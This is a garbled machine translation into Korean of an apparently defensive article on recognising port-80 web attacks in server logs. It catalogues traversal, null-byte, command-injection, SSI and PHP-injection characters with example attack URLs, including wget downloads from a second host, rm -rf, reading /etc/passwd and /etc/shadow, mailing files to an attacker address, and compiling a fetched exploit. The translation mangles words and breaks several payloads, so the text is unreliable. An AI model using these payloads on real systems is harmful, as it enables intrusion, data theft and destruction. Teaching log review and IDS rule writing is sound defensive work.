나도 요약
2.에 대한 자세한 설명
Ⅲ. 더 나아가
4. 다른 일 좀 분석
베로니카 변환
6. 결론
[초록]
기본 웹 사이트가 포트 80의 다양한 보안 문제에 봉사하는 그들을 풀어 계속, 심지어는 이러한 취약점의 공격자가이 사이트 자체를 입력 시스템 관리자 권한을 얻을 수 있도록, 다음은 Zenomorph 포트는 몇 가지 성분에 80 공격 연구, 어떻게 로그에서 레코드로 문제를 내면 얘기.
[상세 정보]
여기에 부분적으로 웹 서버와 그들의 일반적인 공격에서 응용 프로그램 Liezi 디스플레이의 숫자를 통해, 그리고 그 흔적, 이는 단지 Liezi 대규모 공격을 대표하는, 거기 공격의 모든 형태의 목록입니다 아니,이 섹션 것입니다 각 공격의 역할에 대한 상세한 설명, 그리고 어떻게 이러한 취약점을 공격에 악용합니다.
(1) "." ".."그리고 "..." 요청
이러한 공격의 흔적은 아주 공격자가 또는 웜 바이러스 프로그램을 웹 서버의 경로를 변경, 폐쇄 영역에 액세스할 수 있도록하는 데 사용되는 웹 응용 프로그램과 웹 서버에 대한 일반 있습니다. 이러한 결점 대부분의 CGI 프로그램은 ".."요청합니다.
예 :
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
이것은 공격자 Liezi 요청을이 파일을 mosd, 공격자의 획기적인 웹 서버 루트 디렉토리에 다음과 자세한 정보를 얻을 경우 추가 권한을 얻을 수 보여줍니다.
(2) "% 20"요청
% 20 16 진수 값이 아무것도 사용할 수 있습니다,하지만 당신이 그것을 찾을 수있을 것이다 로그를 보면 의미 있지는 않지만 그 16 개의 공간, 몇몇 웹 서버 응용 프로그램은이 캐릭터에 효과적으로 구현할 수 있습니다 실행 따라서 신중하게 로그를 검토해야합니다. 반면에, 요청이 때로는 몇 가지 명령을 수행할 수 있습니다.
예 :
http://host/cgi-bin/lame.cgi?page=ls는 % 20 알 센터 |
이것은 Liezi는 요청한 문서의 전체 카탈로그리스트 유닉스 명령을 실행하기 위해, 여러분의 시스템에 중요한 파일에 액세스하는 공격자가 발생, 추가 권한을 얻기위한 조건을 제공하기 위해 그를 도와 공격자를 보여줍니다.
(3) "% 00"요청
00 %가 16 바이트 16 진수가 비어있다, 그는 웹 응용 프로그램을 속일 수 있었는데, 파일의 종류를 요청합니다.
예 :
http://host/cgi-bin/lame.cgi?page=index.html
성공하면 공격자가이 요청을 인식한다면 이것은 기계에서 유효한 요청, 수, 그는 더는 CGI 수속을 찾을 것입니다.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
그것은 요청과 같은 파일 이름 접미사, : 파일의 html.shtml 또는 다른 유형을 확인하는 것입니다 때문에 아마는 CGI 프로그램이 요청을 수락하지 않습니다. , 이번에는 그것은 공격자가 요청을 파일에 문자 后缀되어야 말할 것입니다 대부분의 프로그램은 당신에게 요청한 파일 형식을 알려줍니다 유효, 파일 이름을 Zai로 이어지는 등 공격자는 시스템의 경로를 걸릴 수도 파일 형식 시스템에 더 민감한 정보를
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd %의 00html
이 요청에 주목하라, 그것이 문서가 허용되는 파일 형식을 확인하는 것입니다 cgi는 프로그램을 속일 것입니다, 공격의 일반적으로 사용되는 방법입니다 유효한 요청 파일에 대한 멍청한 점검으로 일부 응용 프로그램.
(4) "|"요청
이것은 파이프 문자, 유닉스 시스템, 동시에 여러 개의 시스템 명령의 이행에 대한 도움을 요청합니다.
예 :
# 고양이 | grep - i를 access_log ".."
(이 명령은 ".."요청, 일반적으로 공격 및 웜에서 사용되는 로그를 표시합니다) 발견
종종 많은 웹 응용 프로그램이 문자를 사용할 발견, 이것은 또한 IDS는 허위 경보로 연결 로그.
응용 프로그램의주의 시험 때문에 침입 탐지 시스템의 허위 경보를 줄이는 장점이 있음.
여기에 몇 가지 Lieh - 손자의 위치 :
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls하기 |
이 요청 명령은 다음과 같은 Liezi의 일부 변화가있다
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls는 % 20 %를 알 20/etc |
이 요청은 유닉스 시스템의 모든 파일은 / etc 디렉토리를 나열됩니다
http://host/cgi-bin/lame.cgi?page=cat % 20access_log | grep % 20 % 20 - 나 "불쌍해"
고양이 명령 실행 요청과 grep 명령의 구현은 또한, ""절름발이를 확인합니다
(5) ";"요청
유닉스 시스템에서,이 문자는 여러 개의 명령줄 실행을 허용합니다
예 :
# Id; 끝나면 uname -
(구현 아이디 명령, 끝나면 uname 명령의 구현에 따라)
당신은 IDS는 경고의 실패의 위험을 줄일 수 있도록이 문자로 일부 웹 프로그램은 신분증을 초래할 수있는 장애 경고를 기록, 당신은 신중하게, 귀하의 웹 프로그램을 확인해야합니다.
(6) " "및 " "요청
귀하의 기록이 두 문자를 여러 가지 이유로 로그를 확인, 첫 번째 문자는 해당 문서에 추가된 데이터
예제 1 :
에코는 "당신의 h0 h0을 hax0red #" 은 / etc / (motd 요청 본 문서의 정보를 작성 motd)
공격자는 쉽게 웹 페이지에 부당하게 손대고 위와 같이 요청을 사용할 수 있습니다. 유명한 RDS가 공격자를 이용 이를테면는 종종 웹 페이지를 변경하는 데 사용됩니다.
예제 2 :
http://host/something.php=Hi % 20mom % 20Im % 20Bold!
HTML은 그 증상의 언어가 여기에, 그는 또한 시스템에 액세스하는 공격자를 일으킬 수 없다 " "," " 문자, 그러한 공격에 보냈다 통지 것이며, 그것이 합법적인 웹 사이트 정보 (로 이어지는 생각하는 사람들이 혼란 사람 주소를 설정하는 공격자를 방문하여이 링크를 방문,이 요청이 16 진수 문자로 양식에, 그래서 공격의 흔적은 그리 명확하지 않다) 인코딩 수도
(7) "!"요청
이 문자 요청 친위대 (서버 사이드 포함) 공격자는 공격자가 사용자에게 혼란을 링크 설정 클릭하면 내가, 그리고 위와 같은 공격에 대한 공통 언어.
예 :
http://host1/something.php =
Lieh - 손자가 공격자의 사이트 host2에있는 파일을 host1에서 할 수 있습니다 위 (물론 나타나면 방문자가 공격자의 연결 설정을 방문해야합니다.이 요청으로 변환할 수 있습니다 16 16 진수 인코딩 마스크를 쉽게 찾을 수 없음)
동시에,이 접근법은 또한 명령 기관 웹 사이트를 실행할 수 있습니다
예 :
http://host/something.php =
원격 시스템의 구현에 Lieh - 손자는 "아이디"명령, 그것은 웹 사이트의 사용자 ID, 일반적으로 "아무도"또는 표시됩니다 "www가"
이 양식은 또한 숨겨진 파일을 포함하실 수 있습니다.
예 :
http://host/something.php =
숨겨진 파일. Htpasswd가 표시되지 않습니다, 아파치가. 하프 타임에 요청 양식을 이러한 규정을 확립하고, SSI 로고 이러한 제한을 무시합니다, 거부하고 보안 문제로 이어질
(8) ","요청
이러한 공격은 원격으로 삽입의 PHP 웹 응용 프로그램 절차를 시도, 그것은, 서버 설정에 따라, 그리고 직장에서 다른 요소 (예 : PHP가 안전 모드로 설정된)을 처형하라는 명령을 허용할 수 있습니다 사용
예 : http://host/something.php = passthru ( "id를 ");?
간단한 PHP로 응용 프로그램에서는 원격 시스템의 사용자 권한은 로컬 명령을 수행하기 위해 사이트에서 웹이 될 수 있습니다
(9) "`"요청
이 문자는 나중에 Perl로 명령을 실행하는 데 사용, 웹 응용 프로그램에서 문자가 자주 사용되지 않는, 그래서 당신의 로그에서 볼 경우, 매우 신중해야합니다
예 :
http://host/something.cgi =`아이디`
쓰기 문제 펄 cgi는 프로그램의 ID 명령의 실행으로 이어질 것이다
[추가]
다음 절에서는 명령을 수있는, 함께 서류 요청, 그리고 더 많은 공격의 구현을 설명합니다 당신은 원격 명령 실행 결함이있다면, 그것은 어떻게 발견을 확인해야합니다. 이 부분은 단지 당신에게 좋은 아이디어를 제공하고, 귀하의 시스템에 어떤 일이 있는지 말해, 공격자는 시스템 흔적을 공격하려고하지만, 모든 공격자의 명령과 요청을 사용하여 목록을하지 않습니다.
에서는 "/ bin /가요"
당신은 많은 장소와 같은 요청에 로그인할 경우 많은 的 웹 응용 프로그램에서이 명령은 요청은 전체 경로를,이 허점을 가지고, 가능하다면, 대량 주문에 대한 취약성을 Yuanchengzhixing 아니지만 반드시이 문제를 또한 허위 경보 수 있습니다. 다시 한번, 웹 응용 프로그램 작성 (를 CGI, ASP를 PHP를 ...) 등 상기 보안의 기초입니다
예 :
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls는 % 20 알 센터 |
http://host/cgi-bin/bad.cgi?doh=ls는 % 20 - al을;
"가 Cmd.exe"
이것은 껍질의 창문, 공격자가 액세스하는 경우이 스크립트를 실행하면 서버 설정 상태 아무것도, 웜 바이러스 많이 할 수있는 창 기계 上 허가가 80 포트에서 원격 컴퓨터와 통신입니다
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e :
에서는 "/ bin / id가"
이것은 두 개의 이진 파일, 그 문제와 로그로 /인가요 당신이 요청을 여러 곳에서 볼 수있다면 / 빈입니다, 거기에 큰 가능성이 취약점은 원격 명령을 실행할 수 있지만 반드시 문제 또한 거짓 경보 수 있습니다.
그것은 어떤 부분이 표시됩니다 속해있는 사용자 및 그룹
예 :
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ 빈 / RM은"
이 명령은 올바른 사용없이 파일을 삭제할 수있는 매우 위험합니다
예 :
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm %는 20 %의 RF * | 20
http://host/cgi-bin/bad.cgi?doh=rm 20 %의 RF % 20 *;
"wget 및 TFTP를"명령
이러한 명령은 종종 공격자는 추가 권한을 파일을 다운로드 얻을 수 있습니다, wget은 아래의 유닉스 명령, 백도어를 다운로드하는 데 사용될 수 있습니다, TFTP를는 명령 유닉스 및 NT에서 파일을 다운로드하는 데 사용됩니다. 일부의 IIS 웜은 TFTP를하여 다른 호스트에 바이러스를 복사하여 자신을 전파
예 :
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget %의 20http : / / host2/Phantasmp.c | http://를 호스트 / cgi - bin에 / bad.cgi? Doh = wget %의 20http을 : / / www.hwa-security.net/Phantasmp.c;
"고양이"명령
이 명령은 파일의 내용, 구성 파일, 암호 파일, 신용 파일 및 문서와 같은 당신이 생각할 수있는 중요한 정보를 읽는 데 사용 참조하는 데 사용됩니다
예 : http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat의 % | http://host/cgi-bin/을 20/etc/motd bad.cgi? Doh = 고양이 %는 20/etc/motd;
"에코"명령
이 명령은 파일에 이러한 ""index.html로 데이터를 작성하는 데 사용
예 : 20 "구단 - # 키위 % 20was %의 20here"% 20 %를 http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo %의 200day.txt 정보 | 20 "구단 - # 키위 % 20was %의 20here"% 20 %의 200day.txt %를 http://host/cgi-bin/bad.cgi?doh=echo;
"Ps"명령
나열 현재 실행중인 프로세스, 추가 사용 권한을 얻기 위해 공격자를 원격 호스트 위해서는 보안 문제의 몇 가지 아이디어를 얻을 수있는 소프트웨어를 실행 말해
예 : http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps은 % 20 - aux 센터 | http://host/cgi-bin/bad. cgi를? Doh = 추신 % 20 - aux;
"죽여라과 killall"명령
유닉스 시스템 명령, 공격자는 시스템 서비스와 프로세스를 중지 또한 공격자의 흔적을 지울 수, 일부 자식 프로세스가 많이 생성됩니다 악용이 명령을 사용할 수 있습니다이 과정을 죽이려고에
예 : http://host/cgi-bin/bad.cgi?doh=../bin/kill의 % 20~9% 200 | http://host/cgi-bin/bad.cgi?doh=kill % 20 -9 % 200;
"끝나면 uname"명령
이 명령은, 얼마 동안,이 웹 사이트를 통해 순서 알고있는 공격자는 원격 시스템의 이름을 알 수있는 ISP가, 오늘 방문한 수 있습니다 공격자. 끝나면 uname - a 일반적으로, 이러한 로그 파일에 기록됩니다 요청
예 : http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname % 20 - | http://host/cgi-bin/bad. cgi는? Doh = 끝나면 uname % 20 -;
명령의 "참조, gcc가, 펄, 파이썬 등 ..."편집 / 해석
공격자는 wget 또는 TFTP를 통해 이용, 다운로드 및 실행 프로그램으로 이것을 컴파일하는 참조, gcc가 컴파일러를 사용하고 더욱 접근 권한
예 : http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc % 20Phantasmp.c | http://host/cgi-bin/bad. cgi는? Doh = gcc가 % 20Phantasmp.c;. / a.out % 20 - 피의 % 2031337;
당신은 "펄"파이썬 "이러한 지침에 원격 공격자 펄, 파이썬 스크립트를 다운로드해야 할 수도 있습니다 찾을 수를 기록 보면 및 권한을 얻을려고 지역
"메일"명령
공격자들은이 명령 시스템을 사용하여, 공격자가 자신의 사서함에 몇 가지 중요한 문서뿐만 아니라 전자 기꺼이이 메일 폭탄 공격이 진행됩니다
예 : http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail % 20 를 %를 20attacker@fuckcnhonker.org
2.168.22.1;
"chown은, chgrp, chsh, chmod를 등 ..."및 기타 명령
유닉스 시스템 명령을 그들이 파일 사용 권한을 변경할 수 있도록하려면
chown은 = chmod를 = 파일 사용 권한을 chgrp = 설정할 수있는 파일의 소유자를 설정합니다 chsh = 사용자의 쉘을 변경 허용 파일에 대한 그룹 권한을 변경하려면 소유자 허용
예 : http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod % 2만7백77% 20index.html | http://host/cgi-bin/ bad.cgi? Doh = chmod를 % 20,777퍼센트 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown %의 20zeno % 20 / 등 / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh %는 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../ 있습니다. . / .. / .. / 빈 / chgrp %의 20nobody의 %의 20/etc/shadow 정보 |
"/ 기타가 /"passwd 파일
이것은 시스템의 암호 파일, 일반적으로 내려 그림자이며, 암호화된 비밀 번호를 볼 수 없습니다,하지만 유효한 사용자가 알 수있는 공격자, 그리고 시스템의 절대 경로, 사이트 이름 및 기타 정보는, 일반적으로 공격자가 정상적으로 표시됩니다 그림자 해제, 그렇게하여은 / etc / 그림자 파일
"을 / etc /"master.passwd
이 파일의 BSD 시스템 암호 파일에있는 암호화된 비밀 번호를 들어, 루트 계정에있는 파일은 읽기 전용이며, 일부 미숙련 공격자가 자신의 시도를 내부의 내용을 읽을 수 열었습니다., 웹 사이트가있다면 루트 권한을 실행하려면, 다음 공격자는, 우리는 그 안으로 한명씩 올 시스템 관리자에 문제가 많은 내용을 읽을 수 있습니다
"을 / etc / 그림자"
포함하는 암호화된 시스템은 루트 계정과 동일하게 읽기 / 외 / 거의 master.passwd
"을 / etc /"motd
사용자가 유닉스 시스템에 로그인할의 정보는, 데이 "의"메시지가 파일에 나타나면 그것은, 중요한 시스템 정보와 일부 세트 자들을하지 않습니다보고 싶은 사용자의 사용자 관리자를 제공합니다 또한 시스템 버전 정보가 들어, 공격자는 일반적으로 어떤 시스템이 공격자에서 실행되는 이해하는이 파일을 보려면 다음 단계는 시스템에서 이러한 유형의 악용을 검색하고, 시스템에 대한 액세스 권한이 있습니다
"을 / etc / 호스트"
문서는 시스템의 네트워크 설정 대해 자세히 배울 수있는 IP 주소와 네트워크 정보, 공격자 제공
"은 / usr / / conf의 /이 값을 httpd.conf / 아파치"지역
이것은 아파치 웹 서버 구성 파일입니다, 공격자가, cgi는 같은 SSI 그러한 정보를 이해할 수 액세스할 수 있습니다
"/ 기타 / inetd.conf"
이것은 구성하여 원격 컴퓨터를 배울 수있는 inetd 서비스를 공격자가 파일, 여부 액세스 제어하는 경우 래퍼는, 공격자는 다음 단계 "을 / etc / hosts.allow 체크 실행"을 발견했을 때의 래퍼를 사용하여 이러한 서비스를 시작 "을 / etc / hosts.deny"는, 파일 및 일부 설정, 액세스 권한을 변경할 수 있습니다
". Htpasswd,. htaccess 파일 및. Htgroup"
이러한 파일은 일반적으로 웹 사이트의 사용자 인증에, 공격자가 이러한 파일을 볼 것이며, 사용자 이름과 암호를 구하는 데 사용됩니다, 암호 파일을 찾습니다. Htpasswd은, 몇 가지 간단한 해독 과정을 통해 휴식 암호화되어, 공격자가 사이트에 액세스할 수 있도록 보호 영역 (대개 동일한 사용자 이름과 암호를 가진 사용자, 공격자도) 다른 계정을 방문할 수 있습니다
"access_log와 error_log"
이것은 아파치 서버 로그 파일이 있으며, 공격자들은 이러한 파일을, 이러한 요청 봐, 그 기록보기 및 다른 장소에 다른 요청
일반적으로 공격자는 자신의 주소 정보와 같은 이러한 로그 파일을 수정합니다, 귀하의 시스템을 통해 포트 80을 통해 공격자 및 백업 또한이 시스템은 작동하지 않습니다, 거기에 다른 기록 프로그램 녹화 시스템 상태이며 어떤 것이 작업 침입 감지가 어려워진다
"[드라이브 문자] : winntrepairsam._ 또는 [드라이브 문자]를 : winntrepairsam"
공격자가 만약 관리자 암호 파일을, 공격을 시도하는 경우 Windows NT 시스템 암호 파일, 원격 명령이 구현되지 않을 수있다면, 공격자는 일반적으로 다음 "균열로, 비밀 번호의 종류 l0pht 균열"이 도구를 크래킹 이러한 서류를 요청합니다 그런 다음 공격자가 원격 컴퓨터 될 성공적인 제어를 얻을 수
[오버플로 분석]
이 문서에서는 나도 Guan Yu의 오버플로 주제별로 말 것이며, 그 현상과 주목할만한가 특히 우려는 종종 버퍼 트랜스 코딩과 어려운 통해 다른 방법을 달성하기 위해 찾는 공격자를 공격의 흔적에 지시 사항을 제공합니다
여기에 단순한 거짓말이 Zi입니다
예 : http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 금주 모임
소유자는 setuid와 루트 절차가있는 경우이 Liezi은 응용 프로그램에 버퍼 오버플로 프로그램을 테스트하는 성격을 많이 보내 공격자를 보여줍니다, 버퍼 오버플로우은, 오버플로를 통해 원격 명령 실행 호스트 권한을 얻을 수 , setuid 프로그램이 아닐 경우처럼 시스템 전체에 대한 액세스를 얻을 수 있습니다 다음, 오버플은 단지 웹 사이트의 사용자 권한을 실행하는 것입니다
여기 모든 상황을 말할 수 없어,하지만 그날이 갑자기 요청을 많이 찾으면 당신은 정기적으로 당신의 로그 파일을 검사해야하지만 보통이 아닌 요청을보다, 그것은 당신이 물론 오버플로 공격에도있을 수 있습니다 들어서는 것을 의미합니다 새 네트워크 웜 공격
[소리] 변환
모든 공격을 요청 위에서 언급한, 공격자는 대개 기계적 확인 요청, 일반적으로 공격자가 변환 도구, IDS는 이러한 요청을 무시합니다 결과 요청한 콘텐츠 형식을 16 개의 밴드 변환하는 데이터를 사용, IDS는 시스템을 알고 우리는 CGI 취약점 좋은 Liezi 수염입니다 스캐닝 도구를 잘 알고있다. 당신은 시간의 로그를 보면 몇 가지 방법으로 시스템을 공격에 이용하려고 할 수 있습니다 16 - 밴드가 아니라 몇 가지 일반적인 문자 다음, 공격자의 다수 발견
빠른 방법은 로그 이러한 16 개의 16 진수에 대한 요청을 파일 브라우저로 파일을 복사하여 브라우저 오른쪽 요청으로 변환할 수 있고 요청의 내용을 표시합니다 당신이하지 않으면 용기, 올바른 코드를 제공할 수있는 이러한 위험을, 평범한 사람 아스키 걸릴 수 있습니다.
[결론]
이 문서는하지만, 공격의 모든 80 포트를 감싸주지 못할 대부분이 더 일반적인 공격보다 인용되어있다면, 어떻게하여 로그 파일을 확인하는 말, 어떻게 이러한 IDS는 규칙의 수가, 그녀의 목표를 쓰기로하는 추가 웹 시스템 관리자는이 문서가 더 나은 프로그램을 작성하는 프로그램은 웹 개발자가 웹 도움이 되었으면 좋겠 무슨 좋은 생각이 동시에 걱정해야
전자 메일을 보내주시기 바랍니다 admin@cgisecurity.com 노트 : 당신이 어떤 의견과 제안이 있으면.